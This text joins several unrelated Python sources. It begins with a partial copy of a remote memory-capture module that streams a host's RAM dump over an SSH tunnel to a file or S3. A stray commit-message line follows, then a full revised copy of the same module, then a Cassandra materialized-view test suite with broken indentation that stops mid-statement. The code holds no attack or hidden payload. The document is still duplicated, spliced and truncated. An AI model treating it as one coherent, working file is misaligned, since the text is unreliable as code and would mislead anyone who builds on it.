            raise MemoryCaptureAttributeMissingError('filename')
        if destination == OutputDestinations.local:
            logger.info("{0}: dumping to file://{1}".format(self.remote_addr,
                                                           filename))
            result = self.to_file(filename, tunnel_addr, tunnel_port)
        elif destination == OutputDestinations.s3:
            if bucket is None:
                raise MemoryCaptureAttributeMissingError('bucket')
            logger.info(("{0}: dumping memory to s3://{1}/"
                         "{2}".format(self.remote_addr, bucket, filename)))
            result = self.to_s3(bucket, filename, tunnel_addr, tunnel_port)
        else:
            raise MemoryCaptureOutputMissingError(self.remote_addr)
        return result
    def to_file(self, filename, tunnel_addr, tunnel_port):
        """
        Writes memory dump to a local file
        :type filename: str
        :param filename: memory dump output filename
        :type tunnel_addr: str
        :param tunnel_port: ssh tunnel hostname or ip
        :type tunnel_port: int
        :param tunnel_port: ssh tunnel port
        """
        if self.progressbar:
            self.bar = ProgressBar(widgets=self.widgets,
                                   maxval=self.max_size).start()
            self.bar.start()
        with open(filename, 'wb') as self.outfile:
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.sock.connect((tunnel_addr, tunnel_port))
            self.sock.settimeout(self.sock_timeout)
            bytes_since_update = 0
            while True:
                try:
                    data = self.sock.recv(self.recv_size)
                    data_length = len(data)
                    # empty read means the remote side closed the stream
                    if not data:
                        break
                    self.outfile.write(data)
                    self.transfered = self.transfered + data_length
                    bytes_since_update += data_length
                    data = None
                    data_length = 0
                    # only update progress every update_threshold bytes
                    if bytes_since_update > self.update_threshold:
                        self.update_progress()
                        bytes_since_update = 0
                except (socket.timeout, socket.error) as ex:
                    # a receive timeout is treated as end-of-stream
                    if isinstance(ex, socket.timeout):
                        break
                    elif isinstance(ex, socket.error):
                        # retry on interrupted system call, fail otherwise
                        if ex.errno == errno.EINTR:
                            pass
                        else:
                            self.cleanup()
                            raise
                    else:
                        # unreachable: ex is always one of the caught types
                        self.cleanup()
                        raise
        self.cleanup()
        logger.info('{0}: capture complete: {1}'.format(self.remote_addr,
                                                        filename))
        return True
    def to_s3(self, bucket, filename, tunnel_addr, tunnel_port):
        """
        Writes memory dump to s3 bucket
        :type bucket: str
        :param bucket: memory dump output s3 bucket
        :type filename: str
        :param filename: memory dump output filename
        :type tunnel_addr: str
        :param tunnel_port: ssh tunnel hostname or ip
        :type tunnel_port: int
        :param tunnel_port: ssh tunnel port
        """
        if self.progressbar:
            self.bar = ProgressBar(widgets=self.widgets,
                                   maxval=self.max_size).start()
            self.bar.start()
        # uses ambient AWS credentials (anon=False)
        s3 = s3fs.S3FileSystem(anon=False)
        with s3.open('{0}/{1}'.format(bucket, filename), 'wb') as self.outfile:
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.sock.connect((tunnel_addr, tunnel_port))
            self.sock.settimeout(self.sock_timeout)
            bytes_since_update = 0
            while True:
                try:
                    data = self.sock.recv(self.recv_size)
                    data_length = len(data)
                    # empty read means the remote side closed the stream
                    if not data:
                        break
                    self.outfile.write(data)
                    self.transfered = self.transfered + data_length
                    bytes_since_update = bytes_since_update + data_length
                    data = None
                    data_length = 0
                    # only update progress every update_threshold bytes
                    if bytes_since_update > self.update_threshold:
                        self.update_progress()
                        bytes_since_update = 0
                except (socket.timeout, socket.error, select.error) as ex:
                    # a receive timeout is treated as end-of-stream
                    if isinstance(ex, socket.timeout):
                        break
                    elif isinstance(ex, socket.error):
                        # retry on interrupted system call, fail otherwise
                        if ex.errno == errno.EINTR:
                            pass
                        else:
                            self.cleanup()
                            raise
                    elif isinstance(ex, select.error):
                        if ex.errno == errno.EINTR:
                            pass
                        else:
                            self.cleanup()
                            raise
                    else:
                        # unreachable: ex is always one of the caught types
                        self.cleanup()
                        raise
        self.cleanup()
        logger.info('{0}: capture complete: s3://{1}/{2}'.format(self.remote_addr,
                                                                 bucket,
                                                                 filename))
        return True
    def update_progress(self, complete=False):
        """
        Logs capture progress
        :type complete: bool
        :params complete: toggle to finish ncurses progress bar
        """
        if self.progressbar:
            try:
                self.bar.update(self.transfered)
            except Exception as e:
                # transfered can exceed the estimated max_size (padding is a
                # guess); the bar raises on overflow, so warn and carry on
                logger.warn("{0}: {1}, {2} exceeds memsize {3}".format(
                            self.remote_addr,
                            e,
                            self.transfered,
                            self.max_size))
            if complete:
                self.bar.update(self.max_size)
                self.bar.finish()
        else:
            percent = int(100 * float(self.transfered) / float(self.max_size))
            # print a message at 10%, 20%, etc...
            if percent % 10 == 0:
                if self.progress != percent:
                    logger.info("{0}: capture {1}% complete".format(
                                self.remote_addr, percent))
                    self.progress = percent
    def cleanup(self):
        """
        Release resources used during memory capture
        """
        if self.sock is not None:
            self.sock.close()
        if self.outfile is not None:
            self.outfile.close()
        if self.bar is not None:
            self.update_progress(complete=True)
Added a comment explaining the "exceeds memsize" progress-bar warning
from progressbar import ProgressBar, Percentage, Bar, ETA, FileTransferSpeed
from enum import Enum
import errno
import select
import socket
import s3fs
import logging
from margaritashotgun.exceptions import *
logger = logging.getLogger(__name__)
class OutputDestinations(Enum):
    """Supported output targets for a memory capture."""
    local = 'local'  # write the dump to a local file
    s3 = 's3'  # stream the dump to an S3 bucket
class Memory():
    """
    Streams a memory capture from a remote host over a TCP connection
    (typically an SSH tunnel to the capture server) to either a local file
    or an S3 object, optionally rendering an ncurses progress bar.
    """

    def __init__(self, remote_addr, mem_size, progressbar=False,
                 recv_size=1048576, sock_timeout=1):
        """
        :type remote_addr: str
        :param remote_addr: hostname or ip address of target server
        :type mem_size: int
        :param mem_size: target server memory size
            (NOTE(review): max_size() multiplies the padded value by 1024,
            which suggests kilobytes rather than bytes -- confirm with callers)
        :type progressbar: bool
        :param progressbar: ncurses progress bar toggle
        :type recv_size: int
        :param recv_size: transfer socket max receive size
        :type sock_timeout: int
        :param sock_timeout: transfer socket receive timeout
        """
        self.mem_size = mem_size
        self.progressbar = progressbar
        self.recv_size = recv_size
        self.sock_timeout = sock_timeout
        # output overhead added by the lime capture format
        self.padding_percentage = 0.03
        # NOTE: this assignment shadows the max_size() method on the
        # instance; after __init__ runs, self.max_size is the computed size.
        self.max_size = self.max_size(mem_size, self.padding_percentage)
        # emit a progress update roughly every `update_interval` full reads
        self.update_interval = 5
        self.update_threshold = recv_size * self.update_interval
        self.remote_addr = remote_addr
        self.transfered = 0  # bytes received so far
        self.progress = 0    # last logged completion percentage
        self.widgets = [' {0} '.format(remote_addr), Percentage(), ' ', Bar(),
                        ' ', ETA(), ' ', FileTransferSpeed()]
        self.sock = None
        self.outfile = None
        self.bar = None

    def max_size(self, mem_size, padding_percentage):
        """
        Calculates the expected size in bytes of the memory capture

        :type mem_size: int
        :param mem_size: target server memory (the padded value is
            multiplied by 1024, implying kilobytes -- TODO confirm units)
        :type padding_percentage: float
        :param padding_percentage: Output overhead of lime format
        """
        size_in_kb = mem_size + mem_size * padding_percentage
        return size_in_kb * 1024

    def capture(self, tunnel_addr, tunnel_port, filename=None,
                bucket=None, destination=None):
        """
        Captures memory based on the provided OutputDestination

        :type tunnel_addr: str
        :param tunnel_addr: ssh tunnel hostname or ip
        :type tunnel_port: int
        :param tunnel_port: ssh tunnel port
        :type filename: str
        :param filename: memory dump output filename
        :type bucket: str
        :param bucket: output s3 bucket
        :type destination: :py:class:`margaritashotgun.memory.OutputDestinations`
        :param destination: OutputDestinations member

        :raises MemoryCaptureAttributeMissingError: when filename is missing,
            or bucket is missing for an s3 destination
        :raises MemoryCaptureOutputMissingError: when destination is not a
            recognized OutputDestinations member
        """
        if filename is None:
            raise MemoryCaptureAttributeMissingError('filename')

        if destination == OutputDestinations.local:
            logger.info("{0}: dumping to file://{1}".format(self.remote_addr,
                                                            filename))
            result = self.to_file(filename, tunnel_addr, tunnel_port)
        elif destination == OutputDestinations.s3:
            if bucket is None:
                raise MemoryCaptureAttributeMissingError('bucket')
            logger.info(("{0}: dumping memory to s3://{1}/"
                         "{2}".format(self.remote_addr, bucket, filename)))
            result = self.to_s3(bucket, filename, tunnel_addr, tunnel_port)
        else:
            raise MemoryCaptureOutputMissingError(self.remote_addr)
        return result

    def to_file(self, filename, tunnel_addr, tunnel_port):
        """
        Writes memory dump to a local file

        :type filename: str
        :param filename: memory dump output filename
        :type tunnel_addr: str
        :param tunnel_addr: ssh tunnel hostname or ip
        :type tunnel_port: int
        :param tunnel_port: ssh tunnel port
        """
        if self.progressbar:
            # ProgressBar(...).start() already starts the bar; the previous
            # extra self.bar.start() call was redundant and has been removed.
            self.bar = ProgressBar(widgets=self.widgets,
                                   maxval=self.max_size).start()
        with open(filename, 'wb') as self.outfile:
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.sock.connect((tunnel_addr, tunnel_port))
            self.sock.settimeout(self.sock_timeout)
            bytes_since_update = 0
            while True:
                try:
                    data = self.sock.recv(self.recv_size)
                    data_length = len(data)
                    if not data:
                        # remote end closed the connection: capture done
                        break
                    self.outfile.write(data)
                    self.transfered = self.transfered + data_length
                    bytes_since_update += data_length
                    data = None
                    data_length = 0
                    if bytes_since_update > self.update_threshold:
                        self.update_progress()
                        bytes_since_update = 0
                except (socket.timeout, socket.error) as ex:
                    if isinstance(ex, socket.timeout):
                        # no data within sock_timeout: treat as end of stream
                        break
                    elif isinstance(ex, socket.error):
                        if ex.errno == errno.EINTR:
                            # interrupted system call: retry recv
                            pass
                        else:
                            self.cleanup()
                            raise
                    else:
                        self.cleanup()
                        raise
        self.cleanup()
        logger.info('{0}: capture complete: {1}'.format(self.remote_addr,
                                                        filename))
        return True

    def to_s3(self, bucket, filename, tunnel_addr, tunnel_port):
        """
        Writes memory dump to s3 bucket

        :type bucket: str
        :param bucket: memory dump output s3 bucket
        :type filename: str
        :param filename: memory dump output filename
        :type tunnel_addr: str
        :param tunnel_addr: ssh tunnel hostname or ip
        :type tunnel_port: int
        :param tunnel_port: ssh tunnel port
        """
        if self.progressbar:
            # ProgressBar(...).start() already starts the bar; the previous
            # extra self.bar.start() call was redundant and has been removed.
            self.bar = ProgressBar(widgets=self.widgets,
                                   maxval=self.max_size).start()
        s3 = s3fs.S3FileSystem(anon=False)
        with s3.open('{0}/{1}'.format(bucket, filename), 'wb') as self.outfile:
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.sock.connect((tunnel_addr, tunnel_port))
            self.sock.settimeout(self.sock_timeout)
            bytes_since_update = 0
            while True:
                try:
                    data = self.sock.recv(self.recv_size)
                    data_length = len(data)
                    if not data:
                        # remote end closed the connection: capture done
                        break
                    self.outfile.write(data)
                    self.transfered = self.transfered + data_length
                    bytes_since_update = bytes_since_update + data_length
                    data = None
                    data_length = 0
                    if bytes_since_update > self.update_threshold:
                        self.update_progress()
                        bytes_since_update = 0
                except (socket.timeout, socket.error, select.error) as ex:
                    if isinstance(ex, socket.timeout):
                        # no data within sock_timeout: treat as end of stream
                        break
                    elif isinstance(ex, (socket.error, select.error)):
                        # both branches were identical; EINTR means the
                        # syscall was interrupted, so simply retry recv
                        if ex.errno == errno.EINTR:
                            pass
                        else:
                            self.cleanup()
                            raise
                    else:
                        self.cleanup()
                        raise
        self.cleanup()
        logger.info('{0}: capture complete: s3://{1}/{2}'.format(self.remote_addr,
                                                                 bucket,
                                                                 filename))
        return True

    def update_progress(self, complete=False):
        """
        Logs capture progress

        :type complete: bool
        :param complete: toggle to finish ncurses progress bar
        """
        if self.progressbar:
            try:
                self.bar.update(self.transfered)
            except Exception as e:
                # The transfer can legitimately exceed the padded size
                # estimate, which makes the bar raise; just warn and carry on.
                # logger.warn is a deprecated alias of logger.warning.
                logger.warning("{0}: {1}, {2} exceeds memsize {3}".format(
                    self.remote_addr,
                    e,
                    self.transfered,
                    self.max_size))
            if complete:
                self.bar.update(self.max_size)
                self.bar.finish()
        else:
            percent = int(100 * float(self.transfered) / float(self.max_size))
            # print a message at 10%, 20%, etc...
            if percent % 10 == 0:
                if self.progress != percent:
                    logger.info("{0}: capture {1}% complete".format(
                        self.remote_addr, percent))
                    self.progress = percent

    def cleanup(self):
        """
        Release resources used during memory capture

        Closes the transfer socket and output file when they were opened,
        and finalizes the progress bar when one is active.
        """
        if self.sock is not None:
            self.sock.close()
        if self.outfile is not None:
            self.outfile.close()
        if self.bar is not None:
            self.update_progress(complete=True)
|
import time
import collections
import sys
import traceback
import re
from functools import partial
# TODO add in requirements.txt
from enum import Enum # Remove when switching to py3
from multiprocessing import Process, Queue
from unittest import skipIf
from cassandra import ConsistencyLevel
from cassandra.cluster import Cluster
from cassandra.query import SimpleStatement
from dtest import Tester, debug
from tools import since, new_node
from assertions import assert_all, assert_one, assert_invalid, assert_unavailable, assert_none, assert_crc_check_chance_equal
# CASSANDRA-10978. Migration wait (in seconds) to use in bootstrapping tests. Needed to handle
# pathological case of flushing schema keyspace for multiple data directories. See CASSANDRA-6696
# for multiple data directory changes and CASSANDRA-10421 for compaction logging that must be
# written.
MIGRATION_WAIT = 5
@since('3.0')
class TestMaterializedViews(Tester):
"""
Test materialized views implementation.
@jira_ticket CASSANDRA-6477
@since 3.0
"""
def prepare(self, user_table=False, rf=1, options=None, nodes=3):
cluster = self.cluster
cluster.populate([nodes, 0])
if options:
cluster.set_configuration_options(values=options)
cluster.start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1)
self.create_ks(session, 'ks', rf)
if user_table:
session.execute(
("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username));")
)
# create a materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)"))
return session
def _insert_data(self, session):
# insert data
insert_stmt = "INSERT INTO users (username, password, gender, state, birth_year) VALUES "
session.execute(insert_stmt + "('user1', 'ch@ngem3a', 'f', 'TX', 1968);")
session.execute(insert_stmt + "('user2', 'ch@ngem3b', 'm', 'CA', 1971);")
session.execute(insert_stmt + "('user3', 'ch@ngem3c', 'f', 'FL', 1978);")
session.execute(insert_stmt + "('user4', 'ch@ngem3d', 'm', 'TX', 1974);")
def _replay_batchlogs(self):
debug("Replaying batchlog on all nodes")
for node in self.cluster.nodelist():
if node.is_running():
node.nodetool("replaybatchlog")
def create_test(self):
"""Test the materialized view creation"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(len(result), 1, "Expecting 1 materialized view, got" + str(result))
    def test_gcgs_validation(self):
        """Verify that it's not possible to create or set a too low gc_grace_seconds on MVs"""
        session = self.prepare(user_table=True)

        # Shouldn't be able to alter the gc_grace_seconds of the base table to 0
        assert_invalid(session,
                       "ALTER TABLE users WITH gc_grace_seconds = 0",
                       "Cannot alter gc_grace_seconds of the base table of a materialized view "
                       "to 0, since this value is used to TTL undelivered updates. Setting "
                       "gc_grace_seconds too low might cause undelivered updates to expire "
                       "before being replayed.")

        # But can alter the gc_grace_seconds of the base table to a value != 0
        session.execute("ALTER TABLE users WITH gc_grace_seconds = 10")

        # Shouldn't be able to alter the gc_grace_seconds of the MV to 0
        assert_invalid(session,
                       "ALTER MATERIALIZED VIEW users_by_state WITH gc_grace_seconds = 0",
                       "Cannot alter gc_grace_seconds of a materialized view to 0, since "
                       "this value is used to TTL undelivered updates. Setting gc_grace_seconds "
                       "too low might cause undelivered updates to expire before being replayed.")

        # Now let's drop the MV so the restriction on the base table is lifted
        session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")

        # Now we should be able to set the gc_grace_seconds of the base table to 0
        session.execute("ALTER TABLE users WITH gc_grace_seconds = 0")

        # Now we shouldn't be able to create a new MV on this table
        assert_invalid(session,
                       "CREATE MATERIALIZED VIEW users_by_state AS "
                       "SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
                       "PRIMARY KEY (state, username)",
                       "Cannot create materialized view 'users_by_state' for base table 'users' "
                       "with gc_grace_seconds of 0, since this value is used to TTL undelivered "
                       "updates. Setting gc_grace_seconds too low might cause undelivered updates"
                       " to expire before being replayed.")
def insert_test(self):
"""Test basic insertions"""
session = self.prepare(user_table=True)
self._insert_data(session)
result = list(session.execute("SELECT * FROM users;"))
self.assertEqual(len(result), 4, "Expecting {} users, got {}".format(4, len(result)))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='TX';"))
self.assertEqual(len(result), 2, "Expecting {} users, got {}".format(2, len(result)))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='CA';"))
self.assertEqual(len(result), 1, "Expecting {} users, got {}".format(1, len(result)))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='MA';"))
self.assertEqual(len(result), 0, "Expecting {} users, got {}".format(0, len(result)))
def populate_mv_after_insert_test(self):
"""Test that a view is OK when created with existing data"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
for i in xrange(1000):
session.execute("INSERT INTO t (id, v) VALUES ({v}, {v})".format(v=i))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in xrange(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(i), [i, i])
def crc_check_chance_test(self):
"""Test that crc_check_chance parameter is properly populated after mv creation and update"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id) WITH crc_check_chance = 0.5"))
assert_crc_check_chance_equal(session, "t_by_v", 0.5, view=True)
session.execute("ALTER MATERIALIZED VIEW t_by_v WITH crc_check_chance = 0.3")
assert_crc_check_chance_equal(session, "t_by_v", 0.3, view=True)
def prepared_statement_test(self):
"""Test basic insertions with prepared statement"""
session = self.prepare(user_table=True)
insertPrepared = session.prepare(
"INSERT INTO users (username, password, gender, state, birth_year) VALUES (?, ?, ?, ?, ?);"
)
selectPrepared = session.prepare(
"SELECT state, password, session_token FROM users_by_state WHERE state=?;"
)
# insert data
session.execute(insertPrepared.bind(('user1', 'ch@ngem3a', 'f', 'TX', 1968)))
session.execute(insertPrepared.bind(('user2', 'ch@ngem3b', 'm', 'CA', 1971)))
session.execute(insertPrepared.bind(('user3', 'ch@ngem3c', 'f', 'FL', 1978)))
session.execute(insertPrepared.bind(('user4', 'ch@ngem3d', 'm', 'TX', 1974)))
result = list(session.execute("SELECT * FROM users;"))
self.assertEqual(len(result), 4, "Expecting {} users, got {}".format(4, len(result)))
result = list(session.execute(selectPrepared.bind(['TX'])))
self.assertEqual(len(result), 2, "Expecting {} users, got {}".format(2, len(result)))
result = list(session.execute(selectPrepared.bind(['CA'])))
self.assertEqual(len(result), 1, "Expecting {} users, got {}".format(1, len(result)))
result = list(session.execute(selectPrepared.bind(['MA'])))
self.assertEqual(len(result), 0, "Expecting {} users, got {}".format(0, len(result)))
def immutable_test(self):
"""Test that a materialized view is immutable"""
session = self.prepare(user_table=True)
# cannot insert
assert_invalid(session, "INSERT INTO users_by_state (state, username) VALUES ('TX', 'user1');",
"Cannot directly modify a materialized view")
# cannot update
assert_invalid(session, "UPDATE users_by_state SET session_token='XYZ' WHERE username='user1' AND state = 'TX';",
"Cannot directly modify a materialized view")
# cannot delete a row
assert_invalid(session, "DELETE from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot delete a cell
assert_invalid(session, "DELETE session_token from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot alter a table
assert_invalid(session, "ALTER TABLE users_by_state ADD first_name varchar",
"Cannot use ALTER TABLE on Materialized View")
def drop_mv_test(self):
"""Test that we can drop a view properly"""
session = self.prepare(user_table=True)
# create another materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_birth_year AS "
"SELECT * FROM users WHERE birth_year IS NOT NULL AND "
"username IS NOT NULL PRIMARY KEY (birth_year, username)"))
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(len(result), 2, "Expecting {} materialized view, got {}".format(2, len(result)))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(len(result), 1, "Expecting {} materialized view, got {}".format(1, len(result)))
def drop_column_test(self):
"""Test that we cannot drop a column if it is used by a MV"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(len(result), 1, "Expecting {} materialized view, got {}".format(1, len(result)))
assert_invalid(
session,
"ALTER TABLE ks.users DROP state;",
"Cannot drop column state, depended on by materialized views"
)
def drop_table_test(self):
"""Test that we cannot drop a table without deleting its MVs first"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(
len(result), 1,
"Expecting {} materialized view, got {}".format(1, len(result))
)
assert_invalid(
session,
"DROP TABLE ks.users;",
"Cannot drop table when materialized views still depend on it"
)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(
len(result), 1,
"Expecting {} materialized view, got {}".format(1, len(result))
)
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
session.execute("DROP TABLE ks.users;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(
len(result), 0,
"Expecting {} materialized view, got {}".format(1, len(result))
)
def clustering_column_test(self):
"""Test that we can use clustering columns as primary key for a materialized view"""
session = self.prepare()
session.execute(("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username, state, birth_year));"))
# create a materialized view that use a compound key
session.execute(("CREATE MATERIALIZED VIEW users_by_state_birth_year "
"AS SELECT * FROM users WHERE state IS NOT NULL AND birth_year IS NOT NULL "
"AND username IS NOT NULL PRIMARY KEY (state, birth_year, username)"))
self._insert_data(session)
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX'"))
self.assertEqual(len(result), 2, "Expecting {} users, got {}".format(2, len(result)))
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX' AND birth_year=1968"))
self.assertEqual(len(result), 1, "Expecting {} users, got {}".format(1, len(result)))
    def _add_dc_after_mv_test(self, rf):
        """
        @jira_ticket CASSANDRA-10978

        Add datacenter with configurable replication.

        Writes 1k rows (with v = -id), verifies them through both base table
        and view, bootstraps two nodes into a second datacenter, and
        re-verifies the view from one of the new nodes.
        """
        session = self.prepare(rf=rf)

        debug("Creating schema")
        session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
        session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

        debug("Writing 1k to base")
        # v is the negated id, so view keys differ from base keys
        for i in xrange(1000):
            session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

        debug("Reading 1k from view")
        for i in xrange(1000):
            assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])

        debug("Reading 1k from base")
        for i in xrange(1000):
            assert_one(session, "SELECT * FROM t WHERE id = {}".format(i), [i, -i])

        debug("Bootstrapping new node in another dc")
        node4 = new_node(self.cluster, data_center='dc2')
        # migration_task_wait works around flushing delays; see MIGRATION_WAIT
        node4.start(wait_other_notice=True, wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

        # NOTE(review): same debug message as above -- presumably meant to
        # announce the *second* dc2 node (node5)
        debug("Bootstrapping new node in another dc")
        node5 = new_node(self.cluster, remote_debug_port='1414', data_center='dc2')
        node5.start(jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

        session2 = self.patient_exclusive_cql_connection(node4)

        debug("Verifying data from new node in view")
        for i in xrange(1000):
            assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])

        debug("Inserting 100 into base")
        for i in xrange(1000, 1100):
            session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

        debug("Verify 100 in view")
        for i in xrange(1000, 1100):
            assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
    def add_dc_after_mv_simple_replication_test(self):
        """
        @jira_ticket CASSANDRA-10634

        Test that materialized views work as expected when adding a datacenter with SimpleStrategy.
        """
        # an integer rf selects SimpleStrategy with that replication factor
        self._add_dc_after_mv_test(1)
    def add_dc_after_mv_network_replication_test(self):
        """
        @jira_ticket CASSANDRA-10634

        Test that materialized views work as expected when adding a datacenter with NetworkTopologyStrategy.
        """
        # a per-dc replication map selects NetworkTopologyStrategy
        self._add_dc_after_mv_test({'dc1': 1, 'dc2': 1})
    def add_node_after_mv_test(self):
        """
        @jira_ticket CASSANDRA-10978

        Test that materialized views work as expected when adding a node.
        """
        session = self.prepare()

        session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
        session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

        # write 1k rows (v = -id) and verify them through the view
        for i in xrange(1000):
            session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

        for i in xrange(1000):
            assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])

        # bootstrap a fourth node; migration_task_wait works around
        # CASSANDRA-10978 (see MIGRATION_WAIT)
        node4 = new_node(self.cluster)
        node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

        session2 = self.patient_exclusive_cql_connection(node4)

        # all pre-bootstrap view rows must be readable via the new node
        for i in xrange(1000):
            assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])

        # writes made after the bootstrap must also flow into the view
        for i in xrange(1000, 1100):
            session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

        for i in xrange(1000, 1100):
            assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
    def add_write_survey_node_after_mv_test(self):
        """
        @jira_ticket CASSANDRA-10621
        @jira_ticket CASSANDRA-10978

        Test that materialized views work as expected when adding a node in write survey mode.
        """
        session = self.prepare()

        session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
        session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

        # write 1k rows (v = -id) and verify them through the view
        for i in xrange(1000):
            session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

        for i in xrange(1000):
            assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])

        # bootstrap a node with write_survey=true
        node4 = new_node(self.cluster)
        node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true", "-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

        # keep writing while the survey node is up
        for i in xrange(1000, 1100):
            session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

        # both pre- and post-bootstrap rows must be visible through the view
        for i in xrange(1100):
            assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def allow_filtering_test(self):
"""Test that allow filtering works as usual for a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in xrange(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
for i in xrange(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {v}".format(v=i), [i, i, 'a', 3.0])
rows = list(session.execute("SELECT * FROM t_by_v2 WHERE v2 = 'a'"))
self.assertEqual(len(rows), 1000, "Expected 1000 rows but got {}".format(len(rows)))
assert_invalid(session, "SELECT * FROM t_by_v WHERE v = 1 AND v2 = 'a'")
assert_invalid(session, "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = 1")
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {} AND v3 = 3.0 ALLOW FILTERING".format(i),
[i, i, 'a', 3.0]
)
assert_one(
session,
"SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = {} ALLOW FILTERING".format(i),
['a', i, i, 3.0]
)
def secondary_index_test(self):
"""Test that secondary indexes cannot be created on a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
assert_invalid(session, "CREATE INDEX ON t_by_v (v2)",
